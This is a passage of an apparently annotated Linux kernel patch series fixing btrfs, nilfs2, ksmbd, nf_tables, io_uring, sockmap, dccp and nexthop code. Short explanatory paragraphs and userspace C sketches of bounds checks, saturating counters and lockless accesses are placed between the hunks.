+ 	if (!caching_ctl)
+ 		return;
+ 
++	/*
++	 * We've already failed to allocate from this block group, so even if
++	 * there's enough space in the block group it isn't contiguous enough to
++	 * allow for an allocation, so wait for at least the next wakeup tick,
++	 * or for the thing to be done.
++	 */
++	progress = atomic_read(&caching_ctl->progress);
++
+ 	wait_event(caching_ctl->wait, btrfs_block_group_done(cache) ||
+-		   (cache->free_space_ctl->free_space >= num_bytes));
++		   (progress != atomic_read(&caching_ctl->progress) &&
++		    (cache->free_space_ctl->free_space >= num_bytes)));
+ 
+ 	btrfs_put_caching_control(caching_ctl);
+ }
+@@ -660,8 +670,10 @@ next:
+ 
+ 			if (total_found > CACHING_CTL_WAKE_UP) {
+ 				total_found = 0;
+-				if (wakeup)
++				if (wakeup) {
++					atomic_inc(&caching_ctl->progress);
+ 					wake_up(&caching_ctl->wait);
++				}
+ 			}
+ 		}
+ 		path->slots[0]++;
+@@ -767,6 +779,7 @@ int btrfs_cache_block_group(struct btrfs_block_group *cache, bool wait)
+ 	init_waitqueue_head(&caching_ctl->wait);
+ 	caching_ctl->block_group = cache;
+ 	refcount_set(&caching_ctl->count, 2);
++	atomic_set(&caching_ctl->progress, 0);
+ 	btrfs_init_work(&caching_ctl->work, caching_thread, NULL, NULL);
+ 
+ 	spin_lock(&cache->lock);
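
The btrfs hunks add an atomic progress counter that the caching thread
bumps on every wake-up batch. The waiter snapshots it first and then
requires both more progress and enough free space, so an allocator that
already failed against this block group sleeps for at least one more
caching tick instead of being rewoken by free space it already knows is too
fragmented. The waiting pattern, modelled with a condvar (names are
illustrative):

#include <pthread.h>
#include <stdbool.h>

struct caching_ctl {
	pthread_mutex_t lock;
	pthread_cond_t wait;
	unsigned long progress;
	unsigned long free_space;
	bool done;
};

static void wait_progress(struct caching_ctl *c, unsigned long need)
{
	pthread_mutex_lock(&c->lock);
	unsigned long snap = c->progress;	/* snapshot before waiting */

	while (!c->done &&
	       !(c->progress != snap && c->free_space >= need))
		pthread_cond_wait(&c->wait, &c->lock);
	pthread_mutex_unlock(&c->lock);
}

static void caching_tick(struct caching_ctl *c, unsigned long found)
{
	pthread_mutex_lock(&c->lock);
	c->free_space += found;
	c->progress++;		/* mirrors atomic_inc(&caching_ctl->progress) */
	pthread_cond_broadcast(&c->wait);
	pthread_mutex_unlock(&c->lock);
}
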
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index 0a3d386823583..debd42aeae0f1 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -70,6 +70,8 @@ struct btrfs_caching_control {
+ 	wait_queue_head_t wait;
+ 	struct btrfs_work work;
+ 	struct btrfs_block_group *block_group;
++	/* Track progress of caching during allocation. */
++	atomic_t progress;
+ 	refcount_t count;
+ };
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index f22e00dfec6c4..96369c44863a1 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1455,7 +1455,8 @@ static int btrfs_init_fs_root(struct btrfs_root *root, dev_t anon_dev)
+ 		goto fail;
+ 
+ 	if (root->root_key.objectid != BTRFS_TREE_LOG_OBJECTID &&
+-	    !btrfs_is_data_reloc_root(root)) {
++	    !btrfs_is_data_reloc_root(root) &&
++	    is_fstree(root->root_key.objectid)) {
+ 		set_bit(BTRFS_ROOT_SHAREABLE, &root->state);
+ 		btrfs_check_and_init_root_item(&root->root_item);
+ 	}
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 571fcc5ae4dcf..f2ee70c03f0d5 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -4411,8 +4411,11 @@ have_block_group:
+ 			ret = 0;
+ 		}
+ 
+-		if (unlikely(block_group->cached == BTRFS_CACHE_ERROR))
++		if (unlikely(block_group->cached == BTRFS_CACHE_ERROR)) {
++			if (!cache_block_group_error)
++				cache_block_group_error = -EIO;
+ 			goto loop;
++		}
+ 
+ 		bg_ret = NULL;
+ 		ret = do_allocation(block_group, ffe_ctl, &bg_ret);
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 58785dc7080ad..0ad69041954ff 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -3015,11 +3015,12 @@ retry:
+ 			}
+ 
+ 			/*
+-			 * the filesystem may choose to bump up nr_to_write.
++			 * The filesystem may choose to bump up nr_to_write.
+ 			 * We have to make sure to honor the new nr_to_write
+-			 * at any time
++			 * at any time.
+ 			 */
+-			nr_to_write_done = wbc->nr_to_write <= 0;
++			nr_to_write_done = (wbc->sync_mode == WB_SYNC_NONE &&
++					    wbc->nr_to_write <= 0);
+ 		}
+ 		pagevec_release(&pvec);
+ 		cond_resched();
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 3c48273cd7a5a..28bcba2e05908 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -1429,8 +1429,6 @@ out_unlock:
+ 					     clear_bits,
+ 					     page_ops);
+ 		start += cur_alloc_size;
+-		if (start >= end)
+-			return ret;
+ 	}
+ 
+ 	/*
+@@ -1439,9 +1437,11 @@ out_unlock:
+ 	 * space_info's bytes_may_use counter, reserved in
+ 	 * btrfs_check_data_free_space().
+ 	 */
+-	extent_clear_unlock_delalloc(inode, start, end, locked_page,
+-				     clear_bits | EXTENT_CLEAR_DATA_RESV,
+-				     page_ops);
++	if (start < end) {
++		clear_bits |= EXTENT_CLEAR_DATA_RESV;
++		extent_clear_unlock_delalloc(inode, start, end, locked_page,
++					     clear_bits, page_ops);
++	}
+ 	return ret;
+ }
+ 
+diff --git a/fs/btrfs/relocation.c b/fs/btrfs/relocation.c
+index 666a37a0ee897..d3591c7f166ad 100644
+--- a/fs/btrfs/relocation.c
++++ b/fs/btrfs/relocation.c
+@@ -1902,7 +1902,39 @@ again:
+ 				err = PTR_ERR(root);
+ 			break;
+ 		}
+-		ASSERT(root->reloc_root == reloc_root);
++
++		if (unlikely(root->reloc_root != reloc_root)) {
++			if (root->reloc_root) {
++				btrfs_err(fs_info,
++"reloc tree mismatch, root %lld has reloc root key (%lld %u %llu) gen %llu, expect reloc root key (%lld %u %llu) gen %llu",
++					  root->root_key.objectid,
++					  root->reloc_root->root_key.objectid,
++					  root->reloc_root->root_key.type,
++					  root->reloc_root->root_key.offset,
++					  btrfs_root_generation(
++						  &root->reloc_root->root_item),
++					  reloc_root->root_key.objectid,
++					  reloc_root->root_key.type,
++					  reloc_root->root_key.offset,
++					  btrfs_root_generation(
++						  &reloc_root->root_item));
++			} else {
++				btrfs_err(fs_info,
++"reloc tree mismatch, root %lld has no reloc root, expect reloc root key (%lld %u %llu) gen %llu",
++					  root->root_key.objectid,
++					  reloc_root->root_key.objectid,
++					  reloc_root->root_key.type,
++					  reloc_root->root_key.offset,
++					  btrfs_root_generation(
++						  &reloc_root->root_item));
++			}
++			list_add(&reloc_root->root_list, &reloc_roots);
++			btrfs_put_root(root);
++			btrfs_abort_transaction(trans, -EUCLEAN);
++			if (!err)
++				err = -EUCLEAN;
++			break;
++		}
+ 
+ 		/*
+ 		 * set reference count to 1, so btrfs_recover_relocation
+@@ -1975,7 +2007,7 @@ again:
+ 		root = btrfs_get_fs_root(fs_info, reloc_root->root_key.offset,
+ 					 false);
+ 		if (btrfs_root_refs(&reloc_root->root_item) > 0) {
+-			if (IS_ERR(root)) {
++			if (WARN_ON(IS_ERR(root))) {
+ 				/*
+ 				 * For recovery we read the fs roots on mount,
+ 				 * and if we didn't find the root then we marked
+@@ -1984,17 +2016,14 @@ again:
+ 				 * memory.  However there's no reason we can't
+ 				 * handle the error properly here just in case.
+ 				 */
+-				ASSERT(0);
+ 				ret = PTR_ERR(root);
+ 				goto out;
+ 			}
+-			if (root->reloc_root != reloc_root) {
++			if (WARN_ON(root->reloc_root != reloc_root)) {
+ 				/*
+-				 * This is actually impossible without something
+-				 * going really wrong (like weird race condition
+-				 * or cosmic rays).
++				 * This can happen if on-disk metadata has some
++				 * corruption, e.g. bad reloc tree key offset.
+ 				 */
+-				ASSERT(0);
+ 				ret = -EINVAL;
+ 				goto out;
+ 			}
+diff --git a/fs/btrfs/tree-checker.c b/fs/btrfs/tree-checker.c
+index 43f905ab0a18d..2b39c7f9226fe 100644
+--- a/fs/btrfs/tree-checker.c
++++ b/fs/btrfs/tree-checker.c
+@@ -442,6 +442,20 @@ static int check_root_key(struct extent_buffer *leaf, struct btrfs_key *key,
+ 	btrfs_item_key_to_cpu(leaf, &item_key, slot);
+ 	is_root_item = (item_key.type == BTRFS_ROOT_ITEM_KEY);
+ 
++	/*
++	 * Bad rootid for reloc trees.
++	 *
++	 * Reloc trees are only for subvolume trees, other trees only need
++	 * to be COWed to be relocated.
++	 */
++	if (unlikely(is_root_item && key->objectid == BTRFS_TREE_RELOC_OBJECTID &&
++		     !is_fstree(key->offset))) {
++		generic_err(leaf, slot,
++		"invalid reloc tree for root %lld, root id is not a subvolume tree",
++			    key->offset);
++		return -EUCLEAN;
++	}
++
+ 	/* No such tree id */
+ 	if (unlikely(key->objectid == 0)) {
+ 		if (is_root_item)
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index f6e44efb58e15..d4c0895a88116 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -1101,9 +1101,17 @@ int nilfs_set_file_dirty(struct inode *inode, unsigned int nr_dirty)
+ 
+ int __nilfs_mark_inode_dirty(struct inode *inode, int flags)
+ {
++	struct the_nilfs *nilfs = inode->i_sb->s_fs_info;
+ 	struct buffer_head *ibh;
+ 	int err;
+ 
++	/*
++	 * Do not dirty inodes after the log writer has been detached
++	 * and its nilfs_root struct has been freed.
++	 */
++	if (unlikely(nilfs_purging(nilfs)))
++		return 0;
++
+ 	err = nilfs_load_inode_block(inode, &ibh);
+ 	if (unlikely(err)) {
+ 		nilfs_warn(inode->i_sb,
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 6cf64023be31e..21e8260112c8f 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2843,6 +2843,7 @@ void nilfs_detach_log_writer(struct super_block *sb)
+ 		nilfs_segctor_destroy(nilfs->ns_writer);
+ 		nilfs->ns_writer = NULL;
+ 	}
++	set_nilfs_purging(nilfs);
+ 
+ 	/* Force to free the list of dirty files */
+ 	spin_lock(&nilfs->ns_inode_lock);
+@@ -2855,4 +2856,5 @@ void nilfs_detach_log_writer(struct super_block *sb)
+ 	up_write(&nilfs->ns_segctor_sem);
+ 
+ 	nilfs_dispose_list(nilfs, &garbage_list, 1);
++	clear_nilfs_purging(nilfs);
+ }
+diff --git a/fs/nilfs2/the_nilfs.h b/fs/nilfs2/the_nilfs.h
+index 47c7dfbb7ea58..cd4ae1b8ae165 100644
+--- a/fs/nilfs2/the_nilfs.h
++++ b/fs/nilfs2/the_nilfs.h
+@@ -29,6 +29,7 @@ enum {
+ 	THE_NILFS_DISCONTINUED,	/* 'next' pointer chain has broken */
+ 	THE_NILFS_GC_RUNNING,	/* gc process is running */
+ 	THE_NILFS_SB_DIRTY,	/* super block is dirty */
++	THE_NILFS_PURGING,	/* disposing dirty files for cleanup */
+ };
+ 
+ /**
+@@ -208,6 +209,7 @@ THE_NILFS_FNS(INIT, init)
+ THE_NILFS_FNS(DISCONTINUED, discontinued)
+ THE_NILFS_FNS(GC_RUNNING, gc_running)
+ THE_NILFS_FNS(SB_DIRTY, sb_dirty)
++THE_NILFS_FNS(PURGING, purging)
+ 
+ /*
+  * Mount option operations
+diff --git a/fs/smb/server/smb2misc.c b/fs/smb/server/smb2misc.c
+index 33b7e6c4ceffb..e881df1d10cbd 100644
+--- a/fs/smb/server/smb2misc.c
++++ b/fs/smb/server/smb2misc.c
+@@ -380,13 +380,13 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 	}
+ 
+ 	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
+-		if (command == SMB2_OPLOCK_BREAK_HE &&
+-		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_20 &&
+-		    le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_21) {
++		if (!(command == SMB2_OPLOCK_BREAK_HE &&
++		    (le16_to_cpu(pdu->StructureSize2) == OP_BREAK_STRUCT_SIZE_20 ||
++		    le16_to_cpu(pdu->StructureSize2) == OP_BREAK_STRUCT_SIZE_21))) {
+ 			/* special case for SMB2.1 lease break message */
+ 			ksmbd_debug(SMB,
+-				    "Illegal request size %d for oplock break\n",
+-				    le16_to_cpu(pdu->StructureSize2));
++				"Illegal request size %u for command %d\n",
++				le16_to_cpu(pdu->StructureSize2), command);
+ 			return 1;
+ 		}
+ 	}
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 26cf73d664f94..f8ca44622d909 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -2340,9 +2340,16 @@ next:
+ 			break;
+ 		buf_len -= next;
+ 		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
+-		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
++		if (buf_len < sizeof(struct smb2_ea_info)) {
++			rc = -EINVAL;
+ 			break;
++		}
+ 
++		if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
++				le16_to_cpu(eabuf->EaValueLength)) {
++			rc = -EINVAL;
++			break;
++		}
+ 	} while (next != 0);
+ 
+ 	kfree(attr_name);
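
The smb2pdu loop above advanced through a chained EA buffer and only
afterwards validated sizes against the wrong quantity. The fix checks,
after each advance, that a full fixed header fits in the remaining buffer
and then that the variable-length name and value also fit, before either is
touched. The shape of that validation (struct layout is illustrative, not
the SMB2 wire format, and alignment is assumed for the sketch):

#include <stddef.h>
#include <stdint.h>

struct ea_info {
	uint32_t next;		/* offset to following entry, 0 = last */
	uint8_t  name_len;
	uint16_t value_len;
	/* name and value bytes follow */
};

static int walk_eas(const uint8_t *buf, size_t buf_len)
{
	const struct ea_info *ea;
	uint32_t next;

	do {
		if (buf_len < sizeof(*ea))
			return -1;	/* truncated fixed header */
		ea = (const struct ea_info *)buf;
		if (buf_len < sizeof(*ea) + ea->name_len + ea->value_len)
			return -1;	/* truncated name/value */
		/* ...consume the entry... */
		next = ea->next;
		if (next > buf_len)
			return -1;	/* chain points past the buffer */
		buf += next;
		buf_len -= next;
	} while (next != 0);

	return 0;
}
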
+diff --git a/include/linux/cpu.h b/include/linux/cpu.h
+index f98cfe9f188f5..008bfa68cfabc 100644
+--- a/include/linux/cpu.h
++++ b/include/linux/cpu.h
+@@ -72,6 +72,8 @@ extern ssize_t cpu_show_retbleed(struct device *dev,
+ 				 struct device_attribute *attr, char *buf);
+ extern ssize_t cpu_show_spec_rstack_overflow(struct device *dev,
+ 					     struct device_attribute *attr, char *buf);
++extern ssize_t cpu_show_gds(struct device *dev,
++			    struct device_attribute *attr, char *buf);
+ 
+ extern __printf(4, 5)
+ struct device *cpu_device_create(struct device *parent, void *drvdata,
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index 054d7911bfc9f..c1637515a8a41 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -62,6 +62,7 @@ struct sk_psock_progs {
+ 
+ enum sk_psock_state_bits {
+ 	SK_PSOCK_TX_ENABLED,
++	SK_PSOCK_RX_STRP_ENABLED,
+ };
+ 
+ struct sk_psock_link {
+diff --git a/include/linux/tpm.h b/include/linux/tpm.h
+index 4e22e4f4cec85..df5cd4245f299 100644
+--- a/include/linux/tpm.h
++++ b/include/linux/tpm.h
+@@ -282,6 +282,7 @@ enum tpm_chip_flags {
+ 	TPM_CHIP_FLAG_FIRMWARE_POWER_MANAGED	= BIT(6),
+ 	TPM_CHIP_FLAG_FIRMWARE_UPGRADE		= BIT(7),
+ 	TPM_CHIP_FLAG_SUSPENDED			= BIT(8),
++	TPM_CHIP_FLAG_HWRNG_DISABLED		= BIT(9),
+ };
+ 
+ #define to_tpm_chip(d) container_of(d, struct tpm_chip, dev)
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index e09ff87146c1c..5976545aa26b9 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -562,6 +562,9 @@ ieee80211_get_sband_iftype_data(const struct ieee80211_supported_band *sband,
+ 	if (WARN_ON(iftype >= NL80211_IFTYPE_MAX))
+ 		return NULL;
+ 
++	if (iftype == NL80211_IFTYPE_AP_VLAN)
++		iftype = NL80211_IFTYPE_AP;
++
+ 	for (i = 0; i < sband->n_iftype_data; i++)  {
+ 		const struct ieee80211_sband_iftype_data *data =
+ 			&sband->iftype_data[i];
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index f3a37cacb32c3..c752b6f509791 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -1192,6 +1192,29 @@ int __nft_release_basechain(struct nft_ctx *ctx);
+ 
+ unsigned int nft_do_chain(struct nft_pktinfo *pkt, void *priv);
+ 
++static inline bool nft_use_inc(u32 *use)
++{
++	if (*use == UINT_MAX)
++		return false;
++
++	(*use)++;
++
++	return true;
++}
++
++static inline void nft_use_dec(u32 *use)
++{
++	WARN_ON_ONCE((*use)-- == 0);
++}
++
++/* For error and abort path: restore use counter to previous state. */
++static inline void nft_use_inc_restore(u32 *use)
++{
++	WARN_ON_ONCE(!nft_use_inc(use));
++}
++
++#define nft_use_dec_restore	nft_use_dec
++
+ /**
+  *	struct nft_table - nf_tables table
+  *
+@@ -1275,8 +1298,8 @@ struct nft_object {
+ 	struct list_head		list;
+ 	struct rhlist_head		rhlhead;
+ 	struct nft_object_hash_key	key;
+-	u32				genmask:2,
+-					use:30;
++	u32				genmask:2;
++	u32				use;
+ 	u64				handle;
+ 	u16				udlen;
+ 	u8				*udata;
+@@ -1378,8 +1401,8 @@ struct nft_flowtable {
+ 	char				*name;
+ 	int				hooknum;
+ 	int				ops_len;
+-	u32				genmask:2,
+-					use:30;
++	u32				genmask:2;
++	u32				use;
+ 	u64				handle;
+ 	/* runtime data below here */
+ 	struct list_head		hook_list ____cacheline_aligned;
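
The nf_tables header change widens the use counters from 30-bit bitfields
to full u32 and funnels all updates through nft_use_inc()/nft_use_dec(),
which saturate instead of wrapping: an increment at UINT_MAX is refused so
the caller can error out, and a decrement below zero trips WARN_ON_ONCE.
Userspace rendition of the same helpers:

#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

static bool use_inc(uint32_t *use)
{
	if (*use == UINT32_MAX)
		return false;	/* refuse rather than overflow */
	(*use)++;
	return true;
}

static void use_dec(uint32_t *use)
{
	assert(*use > 0);	/* underflow is a bug, as in WARN_ON_ONCE */
	(*use)--;
}
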
+diff --git a/include/trace/events/tcp.h b/include/trace/events/tcp.h
+index 901b440238d5f..0a14c474c6f95 100644
+--- a/include/trace/events/tcp.h
++++ b/include/trace/events/tcp.h
+@@ -381,6 +381,7 @@ TRACE_EVENT(tcp_cong_state_set,
+ 		__field(const void *, skaddr)
+ 		__field(__u16, sport)
+ 		__field(__u16, dport)
++		__field(__u16, family)
+ 		__array(__u8, saddr, 4)
+ 		__array(__u8, daddr, 4)
+ 		__array(__u8, saddr_v6, 16)
+@@ -396,6 +397,7 @@ TRACE_EVENT(tcp_cong_state_set,
+ 
+ 		__entry->sport = ntohs(inet->inet_sport);
+ 		__entry->dport = ntohs(inet->inet_dport);
++		__entry->family = sk->sk_family;
+ 
+ 		p32 = (__be32 *) __entry->saddr;
+ 		*p32 = inet->inet_saddr;
+@@ -409,7 +411,8 @@ TRACE_EVENT(tcp_cong_state_set,
+ 		__entry->cong_state = ca_state;
+ 	),
+ 
+-	TP_printk("sport=%hu dport=%hu saddr=%pI4 daddr=%pI4 saddrv6=%pI6c daddrv6=%pI6c cong_state=%u",
++	TP_printk("family=%s sport=%hu dport=%hu saddr=%pI4 daddr=%pI4 saddrv6=%pI6c daddrv6=%pI6c cong_state=%u",
++		  show_family_name(__entry->family),
+ 		  __entry->sport, __entry->dport,
+ 		  __entry->saddr, __entry->daddr,
+ 		  __entry->saddr_v6, __entry->daddr_v6,
+diff --git a/io_uring/openclose.c b/io_uring/openclose.c
+index 67178e4bb282d..008990e581806 100644
+--- a/io_uring/openclose.c
++++ b/io_uring/openclose.c
+@@ -110,9 +110,11 @@ int io_openat2(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (issue_flags & IO_URING_F_NONBLOCK) {
+ 		/*
+ 		 * Don't bother trying for O_TRUNC, O_CREAT, or O_TMPFILE open,
+-		 * it'll always -EAGAIN
++		 * it'll always -EAGAIN. Note that we test for __O_TMPFILE
++		 * because O_TMPFILE includes O_DIRECTORY, which isn't a flag
++		 * we need to force async for.
+ 		 */
+-		if (open->how.flags & (O_TRUNC | O_CREAT | O_TMPFILE))
++		if (open->how.flags & (O_TRUNC | O_CREAT | __O_TMPFILE))
+ 			return -EAGAIN;
+ 		op.lookup_flags |= LOOKUP_CACHED;
+ 		op.open_flag |= O_NONBLOCK;
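
The io_uring fix works because on Linux O_TMPFILE is a compound constant,
__O_TMPFILE | O_DIRECTORY, so masking request flags with O_TMPFILE also
matched every plain directory open and forced it down the sync path.
Testing the distinguishing bit alone is what the hunk does; a small
demonstration (octal values as on x86, treat them as illustrative):

#include <stdio.h>

#define X__O_TMPFILE	020000000
#define X_O_DIRECTORY	00200000
#define X_O_TMPFILE	(X__O_TMPFILE | X_O_DIRECTORY)

static int needs_async(int flags)
{
	/* wrong: (flags & X_O_TMPFILE) != 0 is true for any directory
	 * open; right: test only the distinguishing bit. */
	return (flags & X__O_TMPFILE) != 0;
}

int main(void)
{
	printf("O_DIRECTORY alone -> %d (want 0)\n",
	       needs_async(X_O_DIRECTORY));
	printf("O_TMPFILE -> %d (want 1)\n", needs_async(X_O_TMPFILE));
	return 0;
}
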
+diff --git a/net/core/filter.c b/net/core/filter.c
+index da71e6812ab51..419ce7c61bd6b 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -4064,12 +4064,6 @@ BPF_CALL_2(bpf_xdp_adjust_tail, struct xdp_buff *, xdp, int, offset)
+ 	if (unlikely(data_end > data_hard_end))
+ 		return -EINVAL;
+ 
+-	/* ALL drivers MUST init xdp->frame_sz, chicken check below */
+-	if (unlikely(xdp->frame_sz > PAGE_SIZE)) {
+-		WARN_ONCE(1, "Too BIG xdp->frame_sz = %d\n", xdp->frame_sz);
+-		return -EINVAL;
+-	}
+-
+ 	if (unlikely(data_end < xdp->data + ETH_HLEN))
+ 		return -EINVAL;
+ 
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 65fb6f5b21b28..296e45b6c3c0d 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1117,13 +1117,19 @@ static void sk_psock_strp_data_ready(struct sock *sk)
+ 
+ int sk_psock_init_strp(struct sock *sk, struct sk_psock *psock)
+ {
++	int ret;
++
+ 	static const struct strp_callbacks cb = {
+ 		.rcv_msg	= sk_psock_strp_read,
+ 		.read_sock_done	= sk_psock_strp_read_done,
+ 		.parse_msg	= sk_psock_strp_parse,
+ 	};
+ 
+-	return strp_init(&psock->strp, sk, &cb);
++	ret = strp_init(&psock->strp, sk, &cb);
++	if (!ret)
++		sk_psock_set_state(psock, SK_PSOCK_RX_STRP_ENABLED);
++
++	return ret;
+ }
+ 
+ void sk_psock_start_strp(struct sock *sk, struct sk_psock *psock)
+@@ -1151,7 +1157,7 @@ void sk_psock_stop_strp(struct sock *sk, struct sk_psock *psock)
+ static void sk_psock_done_strp(struct sk_psock *psock)
+ {
+ 	/* Parser has been stopped */
+-	if (psock->progs.stream_parser)
++	if (sk_psock_test_state(psock, SK_PSOCK_RX_STRP_ENABLED))
+ 		strp_done(&psock->strp);
+ }
+ #else
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index c84e5073c0b66..96db7409baa12 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -148,13 +148,13 @@ static void sock_map_del_link(struct sock *sk,
+ 	list_for_each_entry_safe(link, tmp, &psock->link, list) {
+ 		if (link->link_raw == link_raw) {
+ 			struct bpf_map *map = link->map;
+-			struct bpf_stab *stab = container_of(map, struct bpf_stab,
+-							     map);
+-			if (psock->saved_data_ready && stab->progs.stream_parser)
++			struct sk_psock_progs *progs = sock_map_progs(map);
++
++			if (psock->saved_data_ready && progs->stream_parser)
+ 				strp_stop = true;
+-			if (psock->saved_data_ready && stab->progs.stream_verdict)
++			if (psock->saved_data_ready && progs->stream_verdict)
+ 				verdict_stop = true;
+-			if (psock->saved_data_ready && stab->progs.skb_verdict)
++			if (psock->saved_data_ready && progs->skb_verdict)
+ 				verdict_stop = true;
+ 			list_del(&link->list);
+ 			sk_psock_free_link(link);
+diff --git a/net/dccp/output.c b/net/dccp/output.c
+index b8a24734385ef..fd2eb148d24de 100644
+--- a/net/dccp/output.c
++++ b/net/dccp/output.c
+@@ -187,7 +187,7 @@ unsigned int dccp_sync_mss(struct sock *sk, u32 pmtu)
+ 
+ 	/* And store cached results */
+ 	icsk->icsk_pmtu_cookie = pmtu;
+-	dp->dccps_mss_cache = cur_mps;
++	WRITE_ONCE(dp->dccps_mss_cache, cur_mps);
+ 
+ 	return cur_mps;
+ }
+diff --git a/net/dccp/proto.c b/net/dccp/proto.c
+index a06b5641287a2..abc02d25edc14 100644
+--- a/net/dccp/proto.c
++++ b/net/dccp/proto.c
+@@ -627,7 +627,7 @@ static int do_dccp_getsockopt(struct sock *sk, int level, int optname,
+ 		return dccp_getsockopt_service(sk, len,
+ 					       (__be32 __user *)optval, optlen);
+ 	case DCCP_SOCKOPT_GET_CUR_MPS:
+-		val = dp->dccps_mss_cache;
++		val = READ_ONCE(dp->dccps_mss_cache);
+ 		break;
+ 	case DCCP_SOCKOPT_AVAILABLE_CCIDS:
+ 		return ccid_getsockopt_builtin_ccids(sk, len, optval, optlen);
+@@ -736,7 +736,7 @@ int dccp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	trace_dccp_probe(sk, len);
+ 
+-	if (len > dp->dccps_mss_cache)
++	if (len > READ_ONCE(dp->dccps_mss_cache))
+ 		return -EMSGSIZE;
+ 
+ 	lock_sock(sk);
+@@ -769,6 +769,12 @@ int dccp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		goto out_discard;
+ 	}
+ 
++	/* We need to check dccps_mss_cache after socket is locked. */
++	if (len > dp->dccps_mss_cache) {
++		rc = -EMSGSIZE;
++		goto out_discard;
++	}
++
+ 	skb_reserve(skb, sk->sk_prot->max_header);
+ 	rc = memcpy_from_msg(skb_put(skb, len), msg, len);
+ 	if (rc != 0)
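
dccps_mss_cache is written under the socket lock but read locklessly from
getsockopt() and the early sendmsg() length check, so the hunks mark those
accesses with READ_ONCE()/WRITE_ONCE() to prevent load/store tearing, and
sendmsg re-checks the value under the lock before trusting it. The C11
equivalent of the annotation (names illustrative):

#include <stdatomic.h>

struct dccp_mss {
	atomic_uint mss_cache;
};

/* Relaxed atomics play the READ_ONCE/WRITE_ONCE role: no ordering is
 * implied, only that each access is a single untorn load or store. */
static unsigned int mss_read(struct dccp_mss *dp)
{
	return atomic_load_explicit(&dp->mss_cache, memory_order_relaxed);
}

static void mss_write(struct dccp_mss *dp, unsigned int mss)
{
	atomic_store_explicit(&dp->mss_cache, mss, memory_order_relaxed);
}
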
+diff --git a/net/ipv4/ip_tunnel_core.c b/net/ipv4/ip_tunnel_core.c
+index 92c02c886fe73..586b1b3e35b80 100644
+--- a/net/ipv4/ip_tunnel_core.c
++++ b/net/ipv4/ip_tunnel_core.c
+@@ -224,7 +224,7 @@ static int iptunnel_pmtud_build_icmp(struct sk_buff *skb, int mtu)
+ 		.un.frag.__unused	= 0,
+ 		.un.frag.mtu		= htons(mtu),
+ 	};
+-	icmph->checksum = ip_compute_csum(icmph, len);
++	icmph->checksum = csum_fold(skb_checksum(skb, 0, len, 0));
+ 	skb_reset_transport_header(skb);
+ 
+ 	niph = skb_push(skb, sizeof(*niph));
+diff --git a/net/ipv4/nexthop.c b/net/ipv4/nexthop.c
+index d8ef05347fd98..9cc2879024541 100644
+--- a/net/ipv4/nexthop.c
++++ b/net/ipv4/nexthop.c
+@@ -3221,13 +3221,9 @@ static int rtm_dump_nexthop(struct sk_buff *skb, struct netlink_callback *cb)
+ 				     &rtm_dump_nexthop_cb, &filter);
+ 	if (err < 0) {
+ 		if (likely(skb->len))
+-			goto out;
+-		goto out_err;
++			err = skb->len;
+ 	}
+ 
+-out:
+-	err = skb->len;
+-out_err:
+ 	cb->seq = net->nexthop.seq;
+ 	nl_dump_check_consistent(cb, nlmsg_hdr(skb));
+ 	return err;
+@@ -3367,25 +3363,19 @@ static int rtm_dump_nexthop_bucket_nh(struct sk_buff *skb,
+ 		    dd->filter.res_bucket_nh_id != nhge->nh->id)
+ 			continue;
+ 
++		dd->ctx->bucket_index = bucket_index;
+ 		err = nh_fill_res_bucket(skb, nh, bucket, bucket_index,
+ 					 RTM_NEWNEXTHOPBUCKET, portid,
+ 					 cb->nlh->nlmsg_seq, NLM_F_MULTI,
+ 					 cb->extack);
+-		if (err < 0) {
+-			if (likely(skb->len))
+-				goto out;
+-			goto out_err;
+-		}
++		if (err)
++			return err;
+ 	}
+ 
+ 	dd->ctx->done_nh_idx = dd->ctx->nh.idx + 1;
+-	bucket_index = 0;
++	dd->ctx->bucket_index = 0;
+ 
+-out:
+-	err = skb->len;
